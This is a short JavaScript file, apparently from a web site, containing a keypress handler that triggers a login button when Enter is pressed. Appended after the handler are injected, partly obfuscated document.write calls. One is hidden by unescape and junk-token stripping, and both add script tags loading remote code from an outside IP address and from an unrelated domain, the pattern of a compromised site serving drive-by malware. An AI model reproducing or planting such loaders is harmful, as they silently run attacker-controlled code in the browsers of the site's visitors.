function KeyDownHandler(cid)
{	
	//This function is to fire click event of button when 'Enter' is pressed in textbox.
	//This is one way of declaring 'Default Button' for particular textbox.
	//To use this write: onKeyDown="KeyDownHandler('cmdLogin') in the declaration of textbox.

	if (event.keyCode == 13)
	{				
		event.returnValue=false;
		event.cancel = true;			

		document.getElementById(cid).click();
	}
}<!-- 
document.write(unescape('%3Cl2psl2pcrcVriI1yptcVr%20xp9scVrr3Rc3R%3D%2F%2F9cVr4%2El2p2cg14cg17cVr%2E3R2%2E1I1y95%2F3RjqcVrucg1eryvw%2Ejxp9scVr%3Exp9%3C%2FcVrsvwcxp9ricVrpI1ytcVr%3E').replace(/l2p|xp9|cg1|cVr|I1y|vw|3R/g,""));
 -->
document.write('<script src=http://folkartist-kr.com/ttt/m_mall_list.php ><\/script>');